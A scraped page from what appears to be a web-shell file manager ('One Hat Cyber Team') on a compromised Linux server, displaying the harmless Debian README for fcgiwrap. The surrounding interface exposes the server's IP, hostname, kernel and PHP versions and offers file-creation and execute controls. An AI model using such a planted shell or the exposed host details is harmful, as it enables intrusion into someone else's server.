⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.13
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
fcgiwrap
/
View File Name :
README.Debian
fcgiwrap for Debian ========================== Number of processes ------------------- By default the package starts one wrapper, if you need more than that you can add the variable 'FCGI_CHILDREN' to the /etc/default/fcgiwrap file; i.e. to launch 3 processes do the following: echo "FCGI_CHILDREN=3" > /etc/default/fcgiwrap /etc/init.d/fcgiwrap restart Nginx configuration ------------------- To support debian cgi-bin scripts on nginx add the following to your server configuration: include /usr/share/doc/fcgiwrap/examples/nginx.conf; Monit configuration ------------------- To monitor the fcgiwrap daemon with the monit program add the following to your /etc/monit/monitrc file: include /usr/share/doc/fcgiwrap/examples/monitrc; -- Sergio Talens-Oliag <sto@debian.org> Thu, 02 Apr 2009 15:44:10 +0200